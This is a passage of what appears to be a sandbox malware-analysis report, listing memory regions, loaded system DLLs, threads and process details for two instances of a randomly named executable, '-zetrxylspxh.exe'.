5178 start_va = 0x73f90000 end_va = 0x73fadfff monitored = 0 entry_point = 0x73f9b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 5179 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 5180 start_va = 0x73f80000 end_va = 0x73f89fff monitored = 0 entry_point = 0x73f82a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 5181 start_va = 0x75ef0000 end_va = 0x75f47fff monitored = 0 entry_point = 0x75f325c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 5182 start_va = 0x74a40000 end_va = 0x74a83fff monitored = 0 entry_point = 0x74a59d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 5183 start_va = 0x76a90000 end_va = 0x76b0afff monitored = 0 entry_point = 0x76aae970 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 5184 start_va = 0x76f60000 end_va = 0x76fa4fff monitored = 0 entry_point = 0x76f7de90 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 5185 start_va = 0x74350000 end_va = 0x7435bfff monitored = 0 entry_point = 0x74353930 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 5186 start_va = 0x77180000 end_va = 0x7720cfff monitored = 0 entry_point = 0x771c9b90 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 5187 start_va = 0x77210000 end_va = 0x77253fff monitored = 0 entry_point = 0x77217410 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\SysWOW64\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll") Region: id = 5188 start_va = 0x75f50000 end_va = 0x75f5efff monitored = 0 entry_point = 0x75f52e40 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 5189 start_va = 0x76b10000 end_va = 0x76bfafff monitored = 0 entry_point = 0x76b4d650 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 5190 start_va = 0x6c540000 end_va = 0x6c5d1fff monitored = 0 entry_point = 0x6c54dd60 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll") Region: id = 5589 start_va = 0x540000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 5590 start_va = 0x860000 end_va = 0x95ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000860000" filename = "" Region: id = 5591 start_va = 0x1d0000 end_va = 0x1f9fff monitored = 0 entry_point = 0x1d5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 5592 start_va = 0x960000 end_va = 0xae7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000960000" filename = "" Region: id = 5593 start_va = 0x77150000 end_va = 0x7717afff monitored = 0 entry_point = 0x77155680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Thread: id = 130 os_tid = 0x93c Thread: id = 166 os_tid = 0x13f4 Thread: id = 182 os_tid = 0x105c Process: id = "40" image_name = "-zetrxylspxh.exe" filename = "c:\\program files (x86)\\ealwtgnkh\\-zetrxylspxh.exe" page_root = "0x52c0d000" os_pid = "0x930" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0x664" cmd_line = "\"C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe\"" cur_dir = "C:\\Windows\\system32\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd44" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 4288 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 4289 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 4290 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 4291 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 4292 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 4293 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 4294 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4295 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 4296 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 4297 start_va = 0x400000 end_va = 0x437fff monitored = 1 entry_point = 0x40312a region_type = mapped_file name = "-zetrxylspxh.exe" filename = "\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe" (normalized: "c:\\program files (x86)\\ealwtgnkh\\-zetrxylspxh.exe") Region: id = 4298 start_va = 0x77260000 end_va = 0x773dafff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 4299 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 4300 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 4301 start_va = 0x7fff0000 end_va = 0x7ffc5f80ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 4302 start_va = 0x7ffc5f810000 end_va = 0x7ffc5f9d0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 4303 start_va = 0x7ffc5f9d1000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffc5f9d1000" filename = "" Region: id = 4689 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 4690 start_va = 0x62ee0000 end_va = 0x62f2ffff monitored = 0 entry_point = 0x62ef8180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 4691 start_va = 0x62f30000 end_va = 0x62fa9fff monitored = 0 entry_point = 0x62f43290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 4692 start_va = 0x74530000 end_va = 0x7460ffff monitored = 0 entry_point = 0x74543980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 4693 start_va = 0x62fb0000 end_va = 0x62fb7fff monitored = 0 entry_point = 0x62fb17c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 4694 start_va = 0x440000 end_va = 0x56ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 4695 start_va = 0x74530000 end_va = 0x7460ffff monitored = 0 entry_point = 0x74543980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 4696 start_va = 0x76c20000 end_va = 0x76d9dfff monitored = 0 entry_point = 0x76cd1b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 4697 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 4698 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 4699 start_va = 0x620000 end_va = 0x6ddfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 5191 start_va = 0x76300000 end_va = 0x76446fff monitored = 0 entry_point = 0x76311cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 5192 start_va = 0x76010000 end_va = 0x7615efff monitored = 0 entry_point = 0x760c6820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 5193 start_va = 0x570000 end_va = 0x5affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 5194 start_va = 0x6e0000 end_va = 0x7dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006e0000" filename = "" Region: id = 5195 start_va = 0x74a90000 end_va = 0x75e8efff monitored = 0 entry_point = 0x74c4b990 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 5196 start_va = 0x74290000 end_va = 0x7434dfff monitored = 0 entry_point = 0x742c5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 5197 start_va = 0x76fb0000 end_va = 0x76fe6fff monitored = 0 entry_point = 0x76fb3b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll") Region: id = 5198 start_va = 0x764b0000 end_va = 0x769a8fff monitored = 0 entry_point = 0x766b7610 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\SysWOW64\\windows.storage.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.dll") Region: id = 5199 start_va = 0x76da0000 end_va = 0x76f5cfff monitored = 0 entry_point = 0x76e82a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 5200 start_va = 0x75f60000 end_va = 0x7600cfff monitored = 0 entry_point = 0x75f74f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 5201 start_va = 0x73f90000 end_va = 0x73fadfff monitored = 0 entry_point = 0x73f9b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 5202 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 5203 start_va = 0x73f80000 end_va = 0x73f89fff monitored = 0 entry_point = 0x73f82a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 5204 start_va = 0x75ef0000 end_va = 0x75f47fff monitored = 0 entry_point = 0x75f325c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 5205 start_va = 0x74a40000 end_va = 0x74a83fff monitored = 0 entry_point = 0x74a59d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 5206 start_va = 0x76a90000 end_va = 0x76b0afff monitored = 0 entry_point = 0x76aae970 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 5207 start_va = 0x76f60000 end_va = 0x76fa4fff monitored = 0 entry_point = 0x76f7de90 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 5208 start_va = 0x74350000 end_va = 0x7435bfff monitored = 0 entry_point = 0x74353930 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 5209 start_va = 0x77180000 end_va = 0x7720cfff monitored = 0 entry_point = 0x771c9b90 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 5210 start_va = 0x77210000 end_va = 0x77253fff monitored = 0 entry_point = 0x77217410 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\SysWOW64\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll") Region: id = 5211 start_va = 0x75f50000 end_va = 0x75f5efff monitored = 0 entry_point = 0x75f52e40 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 5212 start_va = 0x76b10000 end_va = 0x76bfafff monitored = 0 entry_point = 0x76b4d650 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 5594 start_va = 0x5b0000 end_va = 0x5effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005b0000" filename = "" Region: id = 5595 start_va = 0x7e0000 end_va = 0x8dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007e0000" filename = "" Region: id = 5596 start_va = 0x6c540000 end_va = 0x6c5d1fff monitored = 0 entry_point = 0x6c54dd60 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll") Region: id = 5597 start_va = 0x1d0000 end_va = 0x1f9fff monitored = 0 entry_point = 0x1d5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 5598 start_va = 0x8e0000 end_va = 0xa67fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008e0000" filename = "" Region: id = 5599 start_va = 0x77150000 end_va = 0x7717afff monitored = 0 entry_point = 0x77155680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Thread: id = 131 os_tid = 0x8f4 Thread: id = 167 os_tid = 0x258 Thread: id = 183 os_tid = 0x288 Process: id = "41" image_name = "-zetrxylspxh.exe" filename = "c:\\program files (x86)\\ealwtgnkh\\-zetrxylspxh.exe" page_root = "0xd012000" os_pid = "0x884" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0x664" cmd_line = "\"C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe\"" cur_dir = "C:\\Windows\\system32\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd44" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 4310 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 4311 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 4312 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 4313 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 4314 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 4315 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 4316 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4317 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 4318 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 4319 start_va = 0x400000 end_va = 0x437fff monitored = 1 entry_point = 0x40312a region_type = mapped_file name = "-zetrxylspxh.exe" filename = "\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe" (normalized: "c:\\program files (x86)\\ealwtgnkh\\-zetrxylspxh.exe") Region: id = 4320 start_va = 0x77260000 end_va = 0x773dafff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 4321 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 4322 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 4323 start_va = 0x7fff0000 end_va = 0x7ffc5f80ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 4324 start_va = 0x7ffc5f810000 end_va = 0x7ffc5f9d0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 4325 start_va = 0x7ffc5f9d1000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffc5f9d1000" filename = "" Region: id = 4700 start_va = 0x5c0000 end_va = 0x5cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005c0000" filename = "" Region: id = 4701 start_va = 0x62ee0000 end_va = 0x62f2ffff monitored = 0 entry_point = 0x62ef8180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 4702 start_va = 0x62f30000 end_va = 0x62fa9fff monitored = 0 entry_point = 0x62f43290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 4703 start_va = 0x74530000 end_va = 0x7460ffff monitored = 0 entry_point = 0x74543980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 4704 start_va = 0x62fb0000 end_va = 0x62fb7fff monitored = 0 entry_point = 0x62fb17c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 4705 start_va = 0x440000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 4706 start_va = 0x74530000 end_va = 0x7460ffff monitored = 0 entry_point = 0x74543980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 4707 start_va = 0x76c20000 end_va = 0x76d9dfff monitored = 0 entry_point = 0x76cd1b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 4708 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 4709 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 4710 start_va = 0x5d0000 end_va = 0x68dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 4711 start_va = 0x76300000 end_va = 0x76446fff monitored = 0 entry_point = 0x76311cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 4712 start_va = 0x76010000 end_va = 0x7615efff monitored = 0 entry_point = 0x760c6820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 4713 start_va = 0x440000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 4714 start_va = 0x4a0000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004a0000" filename = "" Region: id = 4715 start_va = 0x690000 end_va = 0x78ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000690000" filename = "" Region: id = 4716 start_va = 0x74a90000 end_va = 0x75e8efff monitored = 0 entry_point = 0x74c4b990 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 5213 start_va = 0x74290000 end_va = 0x7434dfff monitored = 0 entry_point = 0x742c5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 5214 start_va = 0x76fb0000 end_va = 0x76fe6fff monitored = 0 entry_point = 0x76fb3b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll") Region: id = 5215 start_va = 0x764b0000 end_va = 0x769a8fff monitored = 0 entry_point = 0x766b7610 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\SysWOW64\\windows.storage.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.dll") Region: id = 5216 start_va = 0x76da0000 end_va = 0x76f5cfff monitored = 0 entry_point = 0x76e82a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 5217 start_va = 0x75f60000 end_va = 0x7600cfff monitored = 0 entry_point = 0x75f74f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 5218 start_va = 0x73f90000 end_va = 0x73fadfff monitored = 0 entry_point = 0x73f9b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 5219 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 5220 start_va = 0x73f80000 end_va = 0x73f89fff monitored = 0 entry_point = 0x73f82a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 5221 start_va = 0x75ef0000 end_va = 0x75f47fff monitored = 0 entry_point = 0x75f325c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 5222 start_va = 0x74a40000 end_va = 0x74a83fff monitored = 0 entry_point = 0x74a59d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 5223 start_va = 0x76a90000 end_va = 0x76b0afff monitored = 0 entry_point = 0x76aae970 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 5224 start_va = 0x76f60000 end_va = 0x76fa4fff monitored = 0 entry_point = 0x76f7de90 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 5225 start_va = 0x74350000 end_va = 0x7435bfff monitored = 0 entry_point = 0x74353930 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 5226 start_va = 0x77180000 end_va = 0x7720cfff monitored = 0 entry_point = 0x771c9b90 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 5227 start_va = 0x77210000 end_va = 0x77253fff monitored = 0 entry_point = 0x77217410 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\SysWOW64\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll") Region: id = 5228 start_va = 0x75f50000 end_va = 0x75f5efff monitored = 0 entry_point = 0x75f52e40 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 5229 start_va = 0x76b10000 end_va = 0x76bfafff monitored = 0 entry_point = 0x76b4d650 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 5230 start_va = 0x6c540000 end_va = 0x6c5d1fff monitored = 0 entry_point = 0x6c54dd60 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll") Region: id = 5231 start_va = 0x1d0000 end_va = 0x1f9fff monitored = 0 entry_point = 0x1d5680 